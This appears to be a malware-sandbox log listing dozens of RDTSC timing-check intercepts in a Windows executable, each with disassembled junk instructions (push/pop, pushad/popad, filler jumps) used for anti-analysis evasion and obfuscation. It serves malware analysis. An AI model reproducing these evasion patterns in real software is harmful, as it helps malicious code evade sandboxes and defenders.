Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FAD7 second address: C4FAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F2h 0x00000009 jg 00007F1CC8B8C9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C585A9 second address: C585C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C43h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5746E second address: C5747F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F1CC8B8C9E6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5772B second address: C57738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57877 second address: C5789A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8B8C9E6h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5789A second address: C578D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C4Eh 0x00000008 je 00007F1CC8BB7C36h 0x0000000e jmp 00007F1CC8BB7C42h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8BB7C3Dh 0x0000001c jmp 00007F1CC8BB7C3Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57CEF second address: C57D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F0h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57D0F second address: C57D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C58402 second address: C58408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C58408 second address: C5840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5B618 second address: C5B631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F1CC8B8C9ECh 0x0000000d jng 00007F1CC8B8C9E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5B631 second address: C5B635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C613D7 second address: C613E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C636F7 second address: C6371E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C69232 second address: C69236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C69236 second address: C6923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C693A5 second address: C693A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C693A9 second address: C693B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B56F second address: C6B57A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B57A second address: C6B586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B586 second address: C6B58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B58B second address: C6B59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E573 second address: C6E57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E57E second address: C6E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E584 second address: C6E5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E5A0 second address: C6E5D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6DD11 second address: C6DD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F1CC8B8C9F6h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E01D second address: C6E034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F1CC8BB7C38h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F1CC8BB7C36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C73E87 second address: C73E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C73E8B second address: C73E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72C8C second address: C72CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1CC8B8C9EFh 0x0000000a jmp 00007F1CC8B8C9F9h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72CC6 second address: C72CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72E33 second address: C72E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72F8A second address: C72F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a jns 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72F9C second address: C72FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72FA1 second address: C72FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72FC0 second address: C72FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C204A6 second address: C20515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, edx 0x00000026 push edx 0x00000027 mov dword ptr [ebp+122D2F06h], esi 0x0000002d pop ecx 0x0000002e push 00000004h 0x00000030 ja 00007F1CC8BB7C49h 0x00000036 nop 0x00000037 pushad 0x00000038 push ecx 0x00000039 push eax 0x0000003a pop eax 0x0000003b pop ecx 0x0000003c pushad 0x0000003d jmp 00007F1CC8BB7C45h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C760EF second address: C760F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C760F3 second address: C76108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7D886 second address: C7D8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9ECh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7B7C3 second address: C7B7D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7B7D1 second address: C7B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7B7E7 second address: C7B806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C45h 0x00000009 popad 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BA99 second address: C7BAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F1CC8B8C9E6h 0x00000010 jnl 00007F1CC8B8C9E6h 0x00000016 popad 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BAB6 second address: C7BAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BAC0 second address: C7BAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BD3D second address: C7BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BD43 second address: C7BD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BD48 second address: C7BD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7BD5D second address: C7BD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8B8C9F1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7C98D second address: C7C991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7D003 second address: C7D007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7D007 second address: C7D00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C7D5D5 second address: C7D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C83091 second address: C83095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C83095 second address: C830A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F1CC8B8C9E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C830A7 second address: C830AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C830AD second address: C830B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C870B7 second address: C870C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C870C3 second address: C870CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C870CB second address: C870CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C870CF second address: C870E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C870E0 second address: C8710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C47h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86255 second address: C86267 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86674 second address: C8668E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8668E second address: C86692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C867DC second address: C867E6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C867E6 second address: C867EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86C5F second address: C86C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86C63 second address: C86C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86C6E second address: C86CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F1CC8BB7C48h 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007F1CC8BB7C36h 0x0000001b jno 00007F1CC8BB7C36h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C86CA6 second address: C86CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8CE9B second address: C8CEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8D2B1 second address: C8D2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8D809 second address: C8D81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C3Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8D81C second address: C8D840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1CC8B8C9E6h 0x0000000a popad 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8DB12 second address: C8DB1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1CC8BB7C36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB2B second address: C8EB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB2F second address: C8EB37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB37 second address: C8EB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F1CC8B8C9E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB43 second address: C8EB4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB4D second address: C8EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8B8C9EAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C8EB64 second address: C8EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C93D26 second address: C93D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C960B0 second address: C960BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C98F94 second address: C98FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 jmp 00007F1CC8B8C9F3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CA4833 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C41h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C3Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CA485C second address: CA4861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CA4861 second address: CA4869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CA46D0 second address: CA46D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
